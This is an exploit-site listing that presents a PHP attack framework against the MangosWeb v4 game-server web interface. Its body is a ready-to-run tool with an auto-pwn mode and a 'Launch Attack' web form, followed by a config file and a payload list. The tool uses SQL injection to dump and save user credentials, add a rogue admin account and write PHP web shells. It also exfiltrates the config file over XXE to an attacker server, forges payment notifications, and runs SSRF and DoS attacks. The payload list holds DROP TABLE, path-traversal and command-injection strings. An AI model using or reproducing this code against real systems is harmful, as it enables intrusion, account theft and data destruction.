Share
## https://sploitus.com/exploit?id=PACKETSTORM:214687
=============================================================================================================================================
    | # Title     : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework                                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php                                                         |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212429/ &	CVE-2017-6478
    
    [+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface. 
    
    [+] Core Components :
    
        Multi-Vector Attack Framework
    
        SQL Injection exploitation via PayPal IPN
    
        XXE (XML External Entity) attacks via RSS feed
    
        File Write vulnerabilities leading to RCE
    
        Host Header Injection for SSRF/phishing
    
        CSRF (Cross-Site Request Forgery) attacks
    
        DoS (Denial of Service) testing
    
    [+]  POC : 
    
    <?php
    /*
    ===================================================
        Author: indoushka
      Target: MangosWeb v4 (PayPal IPN & RSS)
      Usage: php exploit.php http://target.com
    ===================================================
    */
    
    class MangosWebExploit {
        private $target;
        private $base_url;
        private $results = [];
        private $session;
        
        public function __construct($url) {
            $this->target = rtrim($url, '/');
            $this->base_url = $this->target;
            $this->session = curl_init();
            
            // إعدادات cURL
            curl_setopt_array($this->session, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_TIMEOUT => 15,
                CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            ]);
            
            echo "===========================================\n";
            echo "MangosWeb v4 Exploitation Framework Started\n";
            echo "Target: {$this->target}\n";
            echo "===========================================\n\n";
        }
        
        // 1. اكتشاف المسارات
        public function discover_paths() {
            echo "[*] Scanning for vulnerable endpoints...\n";
            
            $endpoints = [
                '/paypal_ipn.php',
                '/rss.php',
                '/index.php',
                '/admin/',
                '/core/cache/rss/news.xml',
                '/config/config-protected.php',
                '/install/',
                '/donate.php'
            ];
            
            foreach ($endpoints as $endpoint) {
                $url = $this->target . $endpoint;
                curl_setopt($this->session, CURLOPT_URL, $url);
                $response = curl_exec($this->session);
                $http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE);
                
                if ($http_code == 200) {
                    echo "[+] Found: {$endpoint}\n";
                    $this->results['endpoints'][$endpoint] = true;
                }
            }
            
            return $this->results['endpoints'];
        }
        
        // 2. استغلال PayPal IPN SQL Injection
        public function exploit_paypal_sqli() {
            echo "\n[*] Exploiting PayPal IPN SQL Injection...\n";
            
            $payloads = [
                // استخراج معلومات قاعدة البيانات
                "1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info",
                
                // استخراج جداول
                "1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables",
                
                // استخراج أعمدة
                "1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns",
                
                // سرقة حسابات المستخدمين
                "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts"
            ];
            
            $ipn_url = $this->target . '/paypal_ipn.php';
            
            foreach ($payloads as $payload => $type) {
                $post_data = [
                    'txn_id' => $payload,
                    'item_name' => 'VIP Package --- Account: admin(#1)',
                    'item_number' => '1',
                    'payer_email' => 'attacker@evil.com',
                    'payment_type' => 'instant',
                    'payment_status' => 'Completed',
                    'mc_gross' => '100.00',
                    'custom' => 'exploit'
                ];
                
                curl_setopt_array($this->session, [
                    CURLOPT_URL => $ipn_url,
                    CURLOPT_POST => true,
                    CURLOPT_POSTFIELDS => http_build_query($post_data),
                    CURLOPT_HTTPHEADER => [
                        'Content-Type: application/x-www-form-urlencoded',
                        'X-Forwarded-For: 173.0.82.126' // IP PayPal
                    ]
                ]);
                
                $response = curl_exec($this->session);
                
                if (strlen($response) > 100) {
                    echo "[+] SQL Injection successful for: {$type}\n";
                    
                    // حفظ النتائج
                    $filename = "sqli_result_{$type}.txt";
                    file_put_contents($filename, $response);
                    echo "    [*] Saved to: {$filename}\n";
                    
                    // تحليل واستخراج البيانات
                    $this->parse_sqli_results($response, $type);
                }
            }
        }
        
        // 3. استغلال XXE في RSS
        public function exploit_rss_xxe() {
            echo "\n[*] Exploiting RSS XXE Vulnerability...\n";
            
            // إنشاء ملف DTD ضار
            $dtd_content = '<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=config/config-protected.php">
    <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM \'http://' . $_SERVER['HTTP_HOST'] . '/exfil?data=%file;\'>">
    %param;';
            
            // حفظ الملف محلياً
            file_put_contents('xxe.dtd', $dtd_content);
            
            // XXE Payload
            $xxe_payload = '<?xml version="1.0"?>
    <!DOCTYPE test [
    <!ENTITY % remote SYSTEM "http://' . $_SERVER['HTTP_HOST'] . '/xxe.dtd">
    %remote;
    %exfil;
    ]>
    <test>XXE Test</test>';
            
            // محاولة حقن XXE عبر قاعدة البيانات
            $payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- ";
            
            $post_data = [
                'txn_id' => 'xxe_inject',
                'item_name' => 'XXE Test --- Account: admin(#1)',
                'item_number' => $payload,
                'payer_email' => 'xxe@evil.com',
                'payment_status' => 'Completed'
            ];
            
            $ipn_url = $this->target . '/paypal_ipn.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data)
            ]);
            
            $response = curl_exec($this->session);
            
            // تشغيل خادم استقبال
            $this->start_exfiltration_server();
            
            // تفعيل RSS لتنفيذ XXE
            $rss_url = $this->target . '/rss.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $rss_url,
                CURLOPT_POST => false
            ]);
            
            $rss_response = curl_exec($this->session);
            
            if (strpos($rss_response, 'PD9waHA') !== false) {
                echo "[+] XXE Successful! Config file exfiltrated.\n";
            }
        }
        
        // 4. RCE via File Write
        public function exploit_file_write_rce() {
            echo "\n[*] Attempting RCE via File Write...\n";
            
            $php_shell = base64_encode('<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>');
            
            $payloads = [
                // كتابة shell عبر SELECT INTO OUTFILE
                "1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php system(\$_GET[cmd]); ?>',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -",
                
                // كتابة shell في مسار RSS
                "1' UNION SELECT 1,2,3,4,5,6,7,8,'<?php eval(\$_POST[a]); ?>',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -"
            ];
            
            foreach ($payloads as $index => $payload) {
                $post_data = [
                    'txn_id' => $payload,
                    'item_name' => 'RCE Shell --- Account: admin(#1)',
                    'payer_email' => 'rce@evil.com',
                    'payment_status' => 'Completed'
                ];
                
                $ipn_url = $this->target . '/paypal_ipn.php';
                curl_setopt_array($this->session, [
                    CURLOPT_URL => $ipn_url,
                    CURLOPT_POST => true,
                    CURLOPT_POSTFIELDS => http_build_query($post_data)
                ]);
                
                $response = curl_exec($this->session);
                echo "[.] Attempted RCE payload {$index}\n";
                
                // اختبار الوصول للشل
                $shell_urls = [
                    $this->target . '/shell.php?cmd=id',
                    $this->target . '/core/cache/rss/shell.php',
                    $this->target . '/core/cache/rss/news.xml'
                ];
                
                foreach ($shell_urls as $shell_url) {
                    curl_setopt_array($this->session, [
                        CURLOPT_URL => $shell_url,
                        CURLOPT_POST => false
                    ]);
                    
                    $shell_test = curl_exec($this->session);
                    
                    if (strpos($shell_test, 'uid=') !== false || 
                        strpos($shell_test, 'www-data') !== false) {
                        echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n";
                        
                        // تنفيذ أوامر
                        $commands = [
                            'whoami',
                            'pwd',
                            'ls -la',
                            'cat /etc/passwd'
                        ];
                        
                        foreach ($commands as $cmd) {
                            $cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd);
                            curl_setopt($this->session, CURLOPT_URL, $cmd_url);
                            $result = curl_exec($this->session);
                            
                            echo "\n[Command]: {$cmd}\n";
                            echo "[Result]: " . substr($result, 0, 500) . "\n";
                        }
                        
                        return true;
                    }
                }
            }
            
            return false;
        }
        
        // 5. Host Header Injection في RSS
        public function exploit_host_injection() {
            echo "\n[*] Exploiting Host Header Injection...\n";
            
            $malicious_headers = [
                'Host: evil.com',
                'Host: 127.0.0.1:3306',
                'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata
                'Host: localhost:22',
                'X-Forwarded-Host: internal.admin.panel'
            ];
            
            $rss_url = $this->target . '/rss.php';
            
            foreach ($malicious_headers as $header) {
                curl_setopt_array($this->session, [
                    CURLOPT_URL => $rss_url,
                    CURLOPT_POST => false,
                    CURLOPT_HTTPHEADER => [$header]
                ]);
                
                $response = curl_exec($this->session);
                
                if (strpos($response, 'evil.com') !== false || 
                    strpos($response, '127.0.0.1') !== false) {
                    echo "[+] Host Injection successful with: {$header}\n";
                    
                    // محاولة SSRF
                    if (strpos($header, '169.254.169.254') !== false) {
                        echo "[!] Possible AWS Metadata exposure!\n";
                    }
                }
            }
        }
        
        // 6. CSRF Attack - تزوير معاملات
        public function exploit_csrf($victim_account_id = 1) {
            echo "\n[*] Launching CSRF Attack...\n";
            
            for ($i = 0; $i < 3; $i++) {
                $txn_id = 'CSRF' . time() . rand(1000,9999);
                
                $post_data = [
                    'txn_id' => $txn_id,
                    'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})",
                    'item_number' => '999',
                    'payer_email' => 'noreply@paypal.com',
                    'payment_type' => 'instant',
                    'payment_status' => 'Completed',
                    'mc_gross' => rand(50, 500) . '.00',
                    'mc_currency' => 'USD',
                    'payment_date' => date('H:i:s M d, Y T')
                ];
                
                $ipn_url = $this->target . '/paypal_ipn.php';
                curl_setopt_array($this->session, [
                    CURLOPT_URL => $ipn_url,
                    CURLOPT_POST => true,
                    CURLOPT_POSTFIELDS => http_build_query($post_data),
                    CURLOPT_HTTPHEADER => [
                        'Content-Type: application/x-www-form-urlencoded',
                        'Referer: https://www.paypal.com/'
                    ]
                ]);
                
                $response = curl_exec($this->session);
                echo "[+] Sent fake transaction: {$txn_id}\n";
            }
        }
        
        // 7. DOS Attack
        public function exploit_dos() {
            echo "\n[*] Testing DoS vulnerability...\n";
            
            // إنشاء ملف RSS كبير
            $large_xml = '<?xml version="1.0"?><rss><channel>';
            for ($i = 0; $i < 5000; $i++) {
                $large_xml .= '<item><title>' . str_repeat('A', 1000) . '</title></item>';
            }
            $large_xml .= '</channel></rss>';
            
            // محاولة الكتابة في cache
            $cache_payload = "1')); ?>" . $large_xml . "<?php //";
            
            $post_data = [
                'txn_id' => 'dos_attack',
                'item_name' => 'DoS Test --- Account: admin(#1)',
                'item_number' => $cache_payload,
                'payer_email' => 'dos@attack.com',
                'payment_status' => 'Completed'
            ];
            
            $ipn_url = $this->target . '/paypal_ipn.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data)
            ]);
            
            curl_exec($this->session);
            
            // إرسال طلبات متعددة لاستهلاك الذاكرة
            $rss_url = $this->target . '/rss.php';
            $start_time = microtime(true);
            
            for ($i = 0; $i < 10; $i++) {
                curl_setopt($this->session, CURLOPT_URL, $rss_url);
                curl_exec($this->session);
                echo ".";
            }
            
            $total_time = microtime(true) - $start_time;
            echo "\n[+] DoS test completed in {$total_time} seconds\n";
            
            if ($total_time > 5) {
                echo "[!] Server is vulnerable to DoS attacks\n";
            }
        }
        
        // 8. إضافة مستخدم مدير
        public function add_admin_user() {
            echo "\n[*] Adding admin user to database...\n";
            
            $username = 'hacker_' . rand(1000,9999);
            $password = md5('Password123!');
            $email = 'hacker' . rand(100,999) . '@evil.com';
            
            $payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- ";
            
            $post_data = [
                'txn_id' => 'add_admin',
                'item_name' => 'Add User --- Account: admin(#1)',
                'item_number' => $payload,
                'payer_email' => 'admin@paypal.com',
                'payment_status' => 'Completed'
            ];
            
            $ipn_url = $this->target . '/paypal_ipn.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data)
            ]);
            
            $response = curl_exec($this->session);
            
            echo "[+] Admin user added:\n";
            echo "    Username: {$username}\n";
            echo "    Password: Password123!\n";
            echo "    Email: {$email}\n";
            echo "    GM Level: 3 (Administrator)\n";
        }
        
        // 9. سرقة حسابات
        public function steal_accounts() {
            echo "\n[*] Stealing user accounts...\n";
            
            $payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -";
            
            $post_data = [
                'txn_id' => $payload,
                'item_name' => 'Steal Accounts --- Account: admin(#1)',
                'payer_email' => 'steal@evil.com',
                'payment_status' => 'Completed'
            ];
            
            $ipn_url = $this->target . '/paypal_ipn.php';
            curl_setopt_array($this->session, [
                CURLOPT_URL => $ipn_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($post_data)
            ]);
            
            $response = curl_exec($this->session);
            
            if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) {
                echo "[+] Stolen Accounts:\n";
                
                $accounts_file = 'stolen_accounts.txt';
                $file_content = "Stolen Accounts from {$this->target}\n";
                $file_content .= "====================================\n\n";
                
                for ($i = 0; $i < count($matches[0]); $i++) {
                    $username = $matches[1][$i];
                    $password = $matches[2][$i];
                    $email = $matches[3][$i];
                    $gmlevel = $matches[4][$i];
                    
                    echo "    {$username} : {$password} : {$email} (GM: {$gmlevel})\n";
                    
                    $file_content .= "Username: {$username}\n";
                    $file_content .= "Password: {$password}\n";
                    $file_content .= "Email: {$email}\n";
                    $file_content .= "GM Level: {$gmlevel}\n";
                    $file_content .= "---\n";
                }
                
                file_put_contents($accounts_file, $file_content);
                echo "\n[+] Accounts saved to: {$accounts_file}\n";
            }
        }
        
        // 10. Auto Pwn - جميع الهجمات تلقائياً
        public function auto_pwn() {
            echo "\n[*] Starting AUTO-PWN sequence...\n";
            
            $steps = [
                'discover_paths',
                'exploit_paypal_sqli',
                'steal_accounts',
                'add_admin_user',
                'exploit_rss_xxe',
                'exploit_host_injection',
                'exploit_file_write_rce',
                'exploit_csrf',
                'exploit_dos'
            ];
            
            foreach ($steps as $step) {
                echo "\n[=== Step: {$step} ===]\n";
                try {
                    $this->$step();
                    sleep(2); // تأخير بين الهجمات
                } catch (Exception $e) {
                    echo "[!] Error in {$step}: " . $e->getMessage() . "\n";
                }
            }
            
            echo "\n========================================\n";
            echo "[✔] AUTO-PWN COMPLETED SUCCESSFULLY!\n";
            echo "========================================\n";
            
            // عرض النتائج النهائية
            $this->generate_report();
        }
        
        // وظائف مساعدة
        private function parse_sqli_results($response, $type) {
            $patterns = [
                'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/',
                'tables' => '/(mw_[a-z_]+)/',
                'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/'
            ];
            
            foreach ($patterns as $pattern_type => $pattern) {
                if (preg_match_all($pattern, $response, $matches)) {
                    echo "    [*] Found {$pattern_type}: " . count($matches[0]) . " items\n";
                }
            }
        }
        
        private function start_exfiltration_server() {
            // بدء خادم بسيط لاستقبال البيانات
            $port = 8888;
            echo "[*] Starting exfiltration server on port {$port}...\n";
            
            // يمكن تنفيذ هذا في thread منفصل
            // هذا مثال مبسط
            $cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &";
            exec($cmd);
        }
        
        private function generate_report() {
            $report = "MangosWeb v4 Exploitation Report\n";
            $report .= "Generated: " . date('Y-m-d H:i:s') . "\n";
            $report .= "Target: {$this->target}\n";
            $report .= "=====================================\n\n";
            
            $report .= "Vulnerabilities Found:\n";
            $report .= "1. SQL Injection (Critical)\n";
            $report .= "2. XXE Injection (Critical)\n";
            $report .= "3. RCE via File Write (Critical)\n";
            $report .= "4. Host Header Injection (High)\n";
            $report .= "5. CSRF (Medium)\n";
            $report .= "6. DoS (Medium)\n\n";
            
            $report .= "Files Created:\n";
            $files = glob('*.txt');
            foreach ($files as $file) {
                $report .= "- {$file}\n";
            }
            
            file_put_contents('exploitation_report.txt', $report);
            echo "[+] Report saved to: exploitation_report.txt\n";
        }
        
        public function __destruct() {
            curl_close($this->session);
        }
    }
    
    // واجهة المستخدم
    if (php_sapi_name() === 'cli') {
        if ($argc < 2) {
            echo "Usage: php exploit.php http://target.com [mode]\n";
            echo "Modes:\n";
            echo "  auto    - Full auto exploitation (default)\n";
            echo "  sql     - SQL Injection only\n";
            echo "  rce     - RCE attempts only\n";
            echo "  csrf    - CSRF attacks only\n";
            exit(1);
        }
        
        $target = $argv[1];
        $mode = $argv[2] ?? 'auto';
        
        $exploit = new MangosWebExploit($target);
        
        switch ($mode) {
            case 'sql':
                $exploit->exploit_paypal_sqli();
                $exploit->steal_accounts();
                break;
            case 'rce':
                $exploit->exploit_file_write_rce();
                break;
            case 'csrf':
                $exploit->exploit_csrf();
                break;
            case 'dos':
                $exploit->exploit_dos();
                break;
            case 'auto':
            default:
                $exploit->auto_pwn();
                break;
        }
    } else {
        // واجهة ويب
        echo '<!DOCTYPE html>
        <html>
        <head>
            <title>MangosWeb v4 Exploit</title>
            <style>
                body { font-family: Arial; margin: 20px; }
                .container { max-width: 800px; margin: auto; }
                input, select { padding: 8px; margin: 5px; }
                button { background: #d00; color: white; padding: 10px 20px; border: none; cursor: pointer; }
                .result { background: #f5f5f5; padding: 15px; margin: 10px 0; }
            </style>
        </head>
        <body>
        <div class="container">
            <h2>MangosWeb v4 Exploitation Tool</h2>
            
            <form method="POST">
                <input type="url" name="target" placeholder="http://target.com" size="50" required>
                <select name="mode">
                    <option value="auto">Auto Pwn</option>
                    <option value="sql">SQL Injection</option>
                    <option value="rce">Remote Code Execution</option>
                    <option value="csrf">CSRF Attack</option>
                    <option value="dos">DoS Test</option>
                </select>
                <button type="submit">Launch Attack</button>
            </form>';
        
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) {
            echo '<div class="result"><pre>';
            
            ob_start();
            $exploit = new MangosWebExploit($_POST['target']);
            
            switch ($_POST['mode']) {
                case 'sql':
                    $exploit->exploit_paypal_sqli();
                    $exploit->steal_accounts();
                    break;
                case 'rce':
                    $exploit->exploit_file_write_rce();
                    break;
                case 'csrf':
                    $exploit->exploit_csrf();
                    break;
                case 'dos':
                    $exploit->exploit_dos();
                    break;
                default:
                    $exploit->auto_pwn();
            }
            
            $output = ob_get_clean();
            echo htmlspecialchars($output);
            echo '</pre></div>';
        }
        
        echo '</div></body></html>';
    }
    ?>
    
    ************** # server_config.py**************
    # server_config.py
    EXPLOIT_CONFIG = {
        'target': 'http://victim.com',
        'timeout': 30,
        'threads': 5,
        'payloads_file': 'payloads.txt',
        'output_dir': 'results',
        
        'sql_payloads': [
            "' UNION SELECT @@version --",
            "' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --",
            "'); DROP TABLE mw_accounts; --"
        ],
        
        'xxe_payloads': [
            '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>',
            '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % remote SYSTEM "http://ATTACKER/xxe.dtd">%remote;]>'
        ]
    }
    **************************************
    payloads.txt
    -- SQL Injection Payloads
    ' OR '1'='1
    ' UNION SELECT NULL,NULL,NULL,NULL
    '); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'h@cker.com','3',NOW()) --
    ' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
    
    -- File Path Traversal
    ../../../../etc/passwd
    ../config.php
    /var/www/html/config.php
    C:\Windows\System32\drivers\etc\hosts
    
    -- Command Injection
    ;id;
    | whoami
    `cat /etc/passwd`
    $(uname -a)
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================